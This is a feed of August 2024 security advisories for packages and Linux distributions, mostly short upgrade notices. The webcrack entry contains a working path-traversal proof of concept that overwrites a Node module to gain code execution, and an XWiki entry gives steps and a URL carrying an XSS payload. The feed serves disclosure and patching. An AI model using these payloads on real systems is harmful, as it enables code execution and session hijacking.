12.08.2024 22:52:16	maven	[MAVEN:GHSA-2326-HX7G-3M9R] Apache MINA SSHD: integrity check bypass (high)	Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attackThe mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, both client and server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue, otherwise the connection may still be affected.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2326-HX7G-3M9R
12.08.2024 22:25:26	maven	[MAVEN:GHSA-4VV4-CRW4-8PCW] Apache DolphinScheduler: Resource File Read And Write Vulnerability (high)	File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files.This issue affects Apache DolphinScheduler: from 3.1.0 before 3.2.2.Users are recommended to upgrade to version 3.2.2, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4VV4-CRW4-8PCW
12.08.2024 22:21:36	maven	[MAVEN:GHSA-M9Q4-P56M-MC6Q] Apache DolphinScheduler: RCE by arbitrary js execution (high)	Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. If you are using the switch task plugin, please upgrade to version 3.2.2.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M9Q4-P56M-MC6Q
12.08.2024 20:26:46	npm	[NPM:GHSA-8HC4-VH64-CXMJ] Server-Side Request Forgery in axios (high)	axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8HC4-VH64-CXMJ
12.08.2024 07:59:45	fedora	[FEDORA-2024-4fcf85b0ff] Fedora 39: firefox, nss	Update NSS to 3.103.0Update to Firefox 129.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4fcf85b0ff
12.08.2024 07:59:43	fedora	[FEDORA-2024-b60f51180f] Fedora 39: chromium	Update to 127.0.6533.99 * Critical CVE-2024-7532: Out of bounds memory access in ANGLE * High CVE-2024-7533: Use after free in Sharing * High CVE-2024-7550: Type Confusion in V8 * High CVE-2024-7534: Heap buffer overflow in Layout * High CVE-2024-7535: Inappropriate implementation in V8 * High CVE-2024-7536: Use after free in WebAudio	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b60f51180f
12.08.2024 07:58:59	fedora	[FEDORA-2024-7250fa4a78] Fedora 39: neatvnc	new version RHBZ #2302449,2302450	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7250fa4a78
12.08.2024 04:38:05	fedora	[FEDORA-2024-7f0a88301b] Fedora 40: nss, firefox	Update NSS to 3.103.0Update to Firefox 129.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7f0a88301b
12.08.2024 04:38:02	fedora	[FEDORA-2024-bec5d0df1f] Fedora 40: python3.13	Security fix for CVE-2024-6923.Fix SystemError in PyEval_GetLocals()	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bec5d0df1f
12.08.2024 04:37:50	fedora	[FEDORA-2024-1fbf7f22e0] Fedora 40: neatvnc	new version RHBZ #2302449,2302450	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1fbf7f22e0
12.08.2024 11:10:20	almalinux	[ALSA-2024:5193] httpd:2.4 security update (important)	httpd:2.4 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5193
12.08.2024 03:00:00	debian	[DSA-5747-1] linux	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5747-1
12.08.2024 03:00:00	redhat	[RHSA-2024:5193] httpd:2.4 security update (important)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Security issues via?backend applications whose response headers are malicious or exploitable (CVE-2024-38476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5193
12.08.2024 03:00:00	redhat	[RHSA-2024:5192] 389-ds-base security update (moderate)	389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration.Security Fix(es):* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953)* 389-ds-base: unauthenticated user can trigger a DoS by sending a specific extended search request (CVE-2024-6237)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5192
11.08.2024 06:30:22	fedora	[FEDORA-2024-0c063be1cc] Fedora 39: frr	New version 8.5.5	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c063be1cc
11.08.2024 06:30:20	fedora	[FEDORA-2024-9ed182a5d3] Fedora 39: python-setuptools	Security fix for CVE-2024-6345.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9ed182a5d3
13.08.2024 22:23:51	npm	[NPM:GHSA-P734-XG27-8CFQ] Prototype pollution in izatop bunt (critical)	izatop bunt v0.29.19 was discovered to contain a prototype pollution via the component /esm/qs.js. This vulnerability allows attackers to execute arbitrary code via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P734-XG27-8CFQ
14.08.2024 21:11:54	npm	[NPM:GHSA-QM2Q-9F3Q-2VCV] Trix has a cross-site Scripting vulnerability on copy & paste (moderate)	The Trix editor, versions prior to 2.1.4, is vulnerable to XSS when pasting malicious code. This vulnerability is a bypass of the fix put in place for https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99. In https://github.com/basecamp/trix/pull/1149, we added sanitation for Trix attachments with a `text/html` content type. However, Trix only checks the content type on the paste event's `dataTransfer` object. As long as the `dataTransfer` has a content type of `text/html`, Trix parses its contents and creates an `Attachment` with them, even if the attachment itself doesn't have a `text/html` content type. Trix then uses the attachment content to set the attachment element's `innerHTML`.### ImpactAn attacker could trick a user to copy and paste malicious code that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed.### PatchesUpdate Recommendation: Users should upgrade to Trix editor version 2.1.4 or later, which incorporates proper sanitization of input from copied content.### WorkaroundsThis is not really a workaround but something that should be considered in addition to upgrading to the patched version. If affected users can disallow browsers that don't support a Content Security Policy, then this would be an effective workaround for this and all XSS vulnerabilities. Set CSP policies such as `script-src 'self'` to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using `script-src-elem`.### References* https://github.com/basecamp/trix/pull/1156* https://github.com/basecamp/trix/releases/tag/v2.1.4* https://github.com/basecamp/trix/pull/1149* https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99* [MDN docs for `DataTransfer`](https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer)### CreditsThis vulnerability was reported by HackerOne researcher [thwin_htet](https://hackerone.com/thwin_htet?type=user).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QM2Q-9F3Q-2VCV
14.08.2024 23:52:28	npm	[NPM:GHSA-CCQH-278P-XQ6W] webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle (high)	### SummaryAn arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.### DetailsSource: [packages/webcrack/src/unpack/bundle.ts#L79](https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79)```tsimport { posix } from 'node:path';import type { Module } from './module';// eslint-disable-next-line @typescript-eslint/unbound-methodconst { dirname, join, normalize } = posix;/* ... snip ... /const modulePath = normalize(join(path, module.path));if (!modulePath.startsWith(path)) { throw new Error(`detected path traversal: ${module.path}`);}await mkdir(dirname(modulePath), { recursive: true});await writeFile(modulePath, module.code, 'utf8');```In this code, the application explicitly relies on the POSIX version of path utilities (`dirname`, `join`, `normalize`) from Node.js. However, the vulnerability arises because the POSIX version of the `normalize` function does not recognize `\` as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.### PoCThe following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the `debug` module in Node.js:Malicious Script (what.js):```js(function (e) { var n = {}; function o(r) { if (n[r]) { return n[r].exports; } var a = (n[r] = { i: r, l: false, exports: {}, }); e[r].call(a.exports, a, a.exports, o); a.l = true; return a.exports; } o.p = ''; o((o.s = 386)); })({ './\\..\\node_modules\\debug\\src\\index': function (e, t, n) { module.exports = () => console.log("pwned") }, });```Webcrack Script (index.js):```jsimport fs from 'fs';import { webcrack } from 'webcrack';const input = fs.readFileSync('what.js', 'utf8');const result = await webcrack(input);console.log(result.code);console.log(result.bundle);await result.save('output-dir');```Execution:*Running the above script with `node index.js` twice results in the following output being printed to the terminal:```PS C:\Webcrack> node .\index.jsDebugger attached.(function (e) { var n = {}; function o(r) { if (n[r]) { return n[r].exports; } var a = n[r] = { i: r, l: false, exports: {} }; e[r].call(a.exports, a, a.exports, o); a.l = true; return a.exports; } o.p = ""; o(o.s = 386);})({ "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) { module.exports = () => console.log("pwned"); }});WebpackBundle { type: 'webpack', entryId: '386', modules: Map(1) { './\\..\\node_modules\\debug\\src\\index' => WebpackModule { id: './\\..\\node_modules\\debug\\src\\index', isEntry: false, path: '././\\..\\node_modules\\debug\\src\\index.js', ast: [Object] } }}Waiting for the debugger to disconnect...PS C:\Webcrack> node .\index.jsDebugger attached.pwnedpwnedpwnedpwnedpwnedpwnedpwnedWaiting for the debugger to disconnect...file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444 if (options.log) logger(`${name}: started`); ^TypeError: logger is not a function at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20) at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7) at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20) at async file:///C:/Webcrack/index.js:6:16Node.js v18.16.0```This demonstrates that the debug module was successfully overwritten and hijacked to print `pwned` to the console, confirming the arbitrary file write vulnerability has lead to code execution.### ImpactThis vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CCQH-278P-XQ6W
14.08.2024 18:15:31	alpinelinux	[ALPINE:CVE-2024-7347] nginx vulnerability (medium)	[From CVE-2024-7347] NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_mp4_module, which might allow an attacker to over-read NGINX worker memory resulting in its termination, using a specially crafted mp4 file. The issue only affects NGINX if it is built with the ngx_http_mp4_module and the mp4 directive is used in the configuration file. Additionally, the attack is possible only if an attacker can trigger the processing of a specially crafted mp4 file with the ngx_http_mp4_module. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-7347
14.08.2024 09:26:34	fedora	[FEDORA-2024-0462a59d45] Fedora 40: chromium (high)	Update to 127.0.6533.99 * Critical CVE-2024-7532: Out of bounds memory access in ANGLE * High CVE-2024-7533: Use after free in Sharing * High CVE-2024-7550: Type Confusion in V8 * High CVE-2024-7534: Heap buffer overflow in Layout * High CVE-2024-7535: Inappropriate implementation in V8 * High CVE-2024-7536: Use after free in WebAudio	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0462a59d45
14.08.2024 03:00:00	debian	[DSA-5748-1] ffmpeg (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5748-1
14.08.2024 03:00:00	debian	[DSA-5749-1] flatpak	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5749-1
14.08.2024 19:09:13	almalinux	[ALSA-2024:5258] container-tools:rhel8 security update (important)	container-tools:rhel8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5258
14.08.2024 03:00:00	freebsd	[FREEBSD:9D8E9952-5A42-11EF-A219-1C697A616631] Intel CPUs -- multiple vulnerabilities (high)	Intel reports: A potential security vulnerability in SMI Transfer monitor (STM) may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some 3rd Generation Intel Xeon Scalable Processors may allow denial of service. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some 3rd, 4th, and 5th Generation Intel Xeon Processors may allow escalation of privilege. Intel has released firmware updates to mitigate this potential vulnerability. A potential security vulnerability in the Intel Core Ultra Processor stream cache mechanism may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some Intel Processor stream cache mechanisms may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:9D8E9952-5A42-11EF-A219-1C697A616631
16.08.2024 16:08:14	fedora	[FEDORA-2024-3f9eb3c86c] Fedora 40: tor	Re-add systemd-devel as build dependency so the daemon knows how to notifysystemd that it was started - fixes bz#2302910	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3f9eb3c86c
16.08.2024 05:15:17	alpinelinux	[ALPINE:CVE-2024-43374] vim vulnerability	[From CVE-2024-43374] The UNIX editor Vim prior to version 9.1.0678 has a use-after-free error in argument list handling. When adding a new file to the argument list, this triggers `Buf*` autocommands. If in such an autocommand the buffer that was just opened is closed (including the window where it is shown), this causes the window structure to be freed which contains a reference to the argument list that we are actually modifying. Once the autocommands are completed, the references to the window and argument list are no longer valid and as such cause an use-after-free. Impact is low since the user must either intentionally add some unusual autocommands that wipe a buffer during creation (either manually or by sourcing a malicious plugin), but it will crash Vim. The issue has been fixed as of Vim patch v9.1.0678.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-43374
16.08.2024 04:21:46	fedora	[FEDORA-2024-c452738920] Fedora 39: python3.13	Security fix for CVE-2024-6923.Fix SystemError in PyEval_GetLocals()	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c452738920
16.08.2024 04:21:38	fedora	[FEDORA-2024-7fe5206574] Fedora 39: thunderbird	Update to 115.14.0https://www.thunderbird.net/en-US/thunderbird/115.14.0esr/releasenotes/https://www.mozilla.org/en-US/security/advisories/mfsa2024-38/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7fe5206574
16.08.2024 04:21:36	fedora	[FEDORA-2024-c2da7f4de7] Fedora 39: tor	Re-add systemd-devel as build dependency so the daemon knows how to notifysystemd that it was started - fixes bz#2302910	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c2da7f4de7
15.08.2024 22:15:19	alpinelinux	[ALPINE:CVE-2024-42472] flatpak, bubblewrap vulnerability	[From CVE-2024-42472] Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.14.0 and 1.15.10, a malicious or compromised Flatpak app using persistent directories could access and write files outside of what it would otherwise have access to, which is an attack on integrity and confidentiality.When `persistent=subdir` is used in the application permissions (represented as `--persist=subdir` in the command-line interface), that means that an application which otherwise doesn't have access to the real user home directory will see an empty home directory with a writeable subdirectory `subdir`. Behind the scenes, this directory is actually a bind mount and the data is stored in the per-application directory as `~/.var/app/$APPID/subdir`. This allows existing apps that are not aware of the per-application directory to still work as intended without general home directory access.However, the application does have write access to the application directory `~/.var/app/$APPID` where this directory is stored. If the source directory for the `persistent`/`--persist` option is replaced by a symlink, then the next time the application is started, the bind mount will follow the symlink and mount whatever it points to into the sandbox.Partial protection against this vulnerability can be provided by patching Flatpak using the patches in commits ceec2ffc and 98f79773. However, this leaves a race condition that could be exploited by two instances of a malicious app running in parallel. Closing the race condition requires updating or patching the version of bubblewrap that is used by Flatpak to add the new `--bind-fd` option using the patch and then patching Flatpak to use it. If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=bwrap` (1.15.x) or `--with-system-bubblewrap=bwrap` (1.14.x or older), or a similar option, then the version of bubblewrap that needs to be patched is a system copy that is distributed separately, typically `/usr/bin/bwrap`. This configuration is the one that is typically used in Linux distributions. If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=` (1.15.x) or with `--without-system-bubblewrap` (1.14.x or older), then it is the bundled version of bubblewrap that is included with Flatpak that must be patched. This is typically installed as `/usr/libexec/flatpak-bwrap`. This configuration is the default when building from source code.For the 1.14.x stable branch, these changes are included in Flatpak 1.14.10. The bundled version of bubblewrap included in this release has been updated to 0.6.3. For the 1.15.x development branch, these changes are included in Flatpak 1.15.10. The bundled version of bubblewrap in this release is a Meson "wrap" subproject, which has been updated to 0.10.0. The 1.12.x and 1.10.x branches will not be updated for this vulnerability. Long-term support OS distributions should backport the individual changes into their versions of Flatpak and bubblewrap, or update to newer versions if their stability policy allows it. As a workaround, avoid using applications using the `persistent` (`--persist`) permission.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-42472
15.08.2024 22:09:34	ubuntu	[USN-6909-3] Bind vulnerabilities	Several security issues were fixed in Bind.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-3
15.08.2024 22:00:10	ubuntu	[USN-6964-1] ORC vulnerability	ORC could be made to crash or execute arbitrary code	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6964-1
16.08.2024 01:19:00	maven	[MAVEN:GHSA-CPFP-M5QW-C4R3] Improper Preservation of Permissions in xxl-job (moderate)	Insecure Permissions vulnerability in xxl-job v.2.4.1 allows a remote attacker to execute arbitrary code via the Sub-Task ID component.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CPFP-M5QW-C4R3
16.08.2024 21:15:40	npm	[NPM:GHSA-VWHG-JWR4-VXGG] gettext.js has a Cross-site Scripting injection (high)	### ImpactPossible vulnerability to XSS injection if .po dictionary definition files is corrupted### PatchesUpdate gettext.js to 2.0.3### WorkaroundsMake sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VWHG-JWR4-VXGG
15.08.2024 17:23:12	fedora	[FEDORA-2024-b60eb661a4] Fedora 39: roundcubemail	Version 1.6.8Managesieve: Protect special scripts in managesieve_kolab_master modeFix newmail_notifier notification focus in Chrome (#9467)Fix fatal error when parsing some TNEF attachments (#9462)Fix double scrollbar when composing a mail with many plain text lines (#7760)Fix decoding mail parts with multiple base64-encoded text blocks (#9290)Fix bug where some messages could get malformed in an import from a MBOX file(#9510)Fix invalid line break characters in multi-line text in Sieve scripts (#9543)Fix bug where "with attachment" filter could fail on some fts engines (#9514)Fix bug where an unhandled exception was caused by an invalid image attachment(#9475)Fix bug where a long subject title could not be displayed in some cases (#9416)Fix infinite loop when parsing malformed Sieve script (#9562)Fix bug where imap_conn_option's 'socket' was ignored (#9566)Fix XSS vulnerability in post-processing of sanitized HTML contentCVE-2024-42009Fix XSS vulnerability in serving of attachments other than HTML or SVGCVE-2024-42008Fix information leak (access to remote content) via insufficient CSS filteringCVE-2024-42010	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b60eb661a4
15.08.2024 17:23:11	fedora	[FEDORA-2024-c8290315df] Fedora 39: 389-ds-base	Changelog* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 2.4.6-1- Update to 2.4.6- Resolves: CVE-2024-1062 (rhbz#2261884)- Resolves: CVE-2024-2199 (rhbz#2283632)- Resolves: CVE-2024-3657 (rhbz#2283631)- Resolves: CVE-2024-5953 (rhbz#2292109)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c8290315df
15.08.2024 17:23:11	fedora	[FEDORA-2024-70741fe21f] Fedora 39: dotnet8.0	This is the July 2024 security updates for .NET 8.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.107.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.7.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-70741fe21f
15.08.2024 16:19:28	ubuntu	[USN-6963-1] GNOME Shell vulnerability	GNOME Shell could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6963-1
15.08.2024 14:55:52	ubuntu	[USN-6962-1] LibreOffice vulnerability	LibreOffice could be made to run programs if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6962-1
16.08.2024 00:56:18	npm	[NPM:GHSA-Q83V-HQ3J-4PQ3] Improper access control in Directus (moderate)	Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q83V-HQ3J-4PQ3
16.08.2024 00:55:25	npm	[NPM:GHSA-QF6H-P3MR-VMH5] Code injection in Directus (moderate)	Directus v10.13.0 allows an authenticated external attacker to execute arbitrary JavaScript on the client. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with CVE-2024-6534, it could result in account takeover.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QF6H-P3MR-VMH5
15.08.2024 05:34:19	fedora	[FEDORA-2024-2e908e829a] Fedora 40: roundcubemail	Version 1.6.8Managesieve: Protect special scripts in managesieve_kolab_master modeFix newmail_notifier notification focus in Chrome (#9467)Fix fatal error when parsing some TNEF attachments (#9462)Fix double scrollbar when composing a mail with many plain text lines (#7760)Fix decoding mail parts with multiple base64-encoded text blocks (#9290)Fix bug where some messages could get malformed in an import from a MBOX file(#9510)Fix invalid line break characters in multi-line text in Sieve scripts (#9543)Fix bug where "with attachment" filter could fail on some fts engines (#9514)Fix bug where an unhandled exception was caused by an invalid image attachment(#9475)Fix bug where a long subject title could not be displayed in some cases (#9416)Fix infinite loop when parsing malformed Sieve script (#9562)Fix bug where imap_conn_option's 'socket' was ignored (#9566)Fix XSS vulnerability in post-processing of sanitized HTML contentCVE-2024-42009Fix XSS vulnerability in serving of attachments other than HTML or SVGCVE-2024-42008Fix information leak (access to remote content) via insufficient CSS filteringCVE-2024-42010	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e908e829a
15.08.2024 05:34:18	fedora	[FEDORA-2024-ac07913be8] Fedora 40: 389-ds-base	Changelog* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 3.0.4-2- Replace lmdb with lmdb-libs in Requires* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 3.0.4-1- Update to 3.0.4- Resolves: CVE-2024-1062 (rhbz#2261884)- Resolves: CVE-2024-2199 (rhbz#2283632)- Resolves: CVE-2024-3657 (rhbz#2283631)- Resolves: CVE-2024-5953 (rhbz#2292109)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ac07913be8
15.08.2024 05:34:16	fedora	[FEDORA-2024-04cb0f92bc] Fedora 40: dotnet8.0	This is the July 2024 security updates for .NET 8.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.107.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.7.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-04cb0f92bc
15.08.2024 03:00:00	cisa	[CISA-2024:0815] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0815
17.08.2024 04:51:07	fedora	[FEDORA-2024-e83af0855e] Fedora 39: httpd	Fix regression introduced by CVE-2024-38474 fixnew version 2.4.62Fixes CVE-2024-40725	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e83af0855e
17.08.2024 04:51:06	fedora	[FEDORA-2024-ef8a7031e7] Fedora 39: bind, bind-dyndb-ldap	Update to BIND 9.18.28Security FixesA malicious DNS client that sent many queries over TCP but never read theresponses could cause a server to respond slowly or not at all for otherclients. This has been fixed. (CVE-2024-0760) [GL #4481]It is possible to craft excessively large resource records sets, which have theeffect of slowing down database processing. This has been addressed by adding aconfigurable limit to the number of records that can be stored per name and typein a cache or zone database. The default is 100, which can be tuned with the newmax-records-per-type option. [GL #497] [GL #3405]It is possible to craft excessively large numbers of resource record types for agiven owner name, which has the effect of slowing down database processing. Thishas been addressed by adding a configurable limit to the number of records thatcan be stored per name and type in a cache or zone database. The default is 100,which can be tuned with the new max-types-per-name option. (CVE-2024-1737) [GL#3403]ISC would like to thank Toshifumi Sakaguchi who independently discovered andresponsibly reported the issue to ISC. [GL #4548]Validating DNS messages signed using the SIG(0) protocol (RFC 2931) could causeexcessive CPU load, leading to a denial-of-service condition. Support for SIG(0)message validation was removed from this version of named. (CVE-2024-1975) [GL#4480]Due to a logic error, lookups that triggered serving stale data and requiredlookups in local authoritative zone data could have resulted in an assertionfailure. This has been fixed. (CVE-2024-4076) [GL #4507]Potential data races were found in our DoH implementation, related to HTTP/2session object management and endpoints set object management afterreconfiguration. These issues have been fixed. [GL #4473]ISC would like to thank Dzintars and Ivo from nic.lv for bringing this to ourattention.When looking up the NS records of parent zones as part of looking up DS records,it was possible for named to trigger an assertion failure if serve-stale wasenabled. This has been fixed. [GL #4661]https://downloads.isc.org/isc/bind9/9.18.28/doc/arm/html/notes.html	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef8a7031e7
18.08.2024 03:00:00	debian	[DSA-5750-1] python-asyncssh	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5750-1
18.08.2024 03:00:00	freebsd	[FREEBSD:AC025402-4CBC-4177-BD99-C20C03A07F23] electron{29,30} -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-6776. Security: backported fix for CVE-2024-6778. Security: backported fix for CVE-2024-6777. Security: backported fix for CVE-2024-6773. Security: backported fix for CVE-2024-6774. Security: backported fix for CVE-2024-6772. Security: backported fix for CVE-2024-6775. Security: backported fix for CVE-2024-6779. Security: backported fix for CVE-2024-6989. Security: backported fix for CVE-2024-6991.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:AC025402-4CBC-4177-BD99-C20C03A07F23
18.08.2024 03:00:00	freebsd	[FREEBSD:E61AF8F4-455D-4F99-8D81-FBB004929DAB] electron31 -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-6989. Security: backported fix for CVE-2024-6991.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E61AF8F4-455D-4F99-8D81-FBB004929DAB
20.08.2024 03:02:38	ubuntu	[USN-6967-1] Intel Microcode vulnerabilities (high)	Several security issues were fixed in Intel Microcode.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6967-1
20.08.2024 00:49:15	maven	[MAVEN:GHSA-F963-4CQ8-2GW7] In XWiki Platform, payloads stored in content is executed when a user with script/programming right edit them (critical)	### ImpactA user without script/programming right can trick a user with elevated rights to edit a content with a malicious payload using a WYSIWYG editor.The user with elevated rights is not warned beforehand that they are going to edit possibly dangerous content.The payload is executed at edit time.### PatchesThis vulnerability has been patched in XWiki 15.10RC1.### WorkaroundsNo workaround. It is advised to upgrade to XWiki 15.10+.### References* https://jira.xwiki.org/browse/XWIKI-20331* https://jira.xwiki.org/browse/XWIKI-21311* https://jira.xwiki.org/browse/XWIKI-21481* https://jira.xwiki.org/browse/XWIKI-21482* https://jira.xwiki.org/browse/XWIKI-21483* https://jira.xwiki.org/browse/XWIKI-21484* https://jira.xwiki.org/browse/XWIKI-21485* https://jira.xwiki.org/browse/XWIKI-21486* https://jira.xwiki.org/browse/XWIKI-21487* https://jira.xwiki.org/browse/XWIKI-21488* https://jira.xwiki.org/browse/XWIKI-21489* https://jira.xwiki.org/browse/XWIKI-21490### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)### AttributionThis vulnerability has been reported on Intigriti by @floerer	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F963-4CQ8-2GW7
20.08.2024 00:49:10	maven	[MAVEN:GHSA-WCG9-PGQV-XM5V] XWiki Platform allows XSS through XClass name in string properties (critical)	### ImpactIs it possible for a user without Script or Programming rights to craft a URL pointing to a page with arbitrary JavaScript.This requires social engineer to trick a user to follow the URL.#### Reproduction steps1. As a user without script or programming right, create a (non-terminal) document named `" + alert(1) + "` (the quotes need to be part of the name).1. Edit the class.1. Add a string property named `"test"`.1. Edit using the object editor and add an object of the created class1. Get an admin to open `<xwiki-server>/xwiki/bin/view/%22%20%2B%20alert(1)%20%2B%20%22/?viewer=display&type=object&property=%22%20%2B%20alert(1)%20%2B%20%22.WebHome.test&mode=edit` where `<xwiki-server>` is the URL of your XWiki installation.### PatchesThis has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.### WorkaroundsWe're not aware of any workaround except upgrading.### References- https://jira.xwiki.org/browse/XWIKI-21810- https://github.com/xwiki/xwiki-platform/commit/27eca8423fc1ad177518077a733076821268509c	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WCG9-PGQV-XM5V
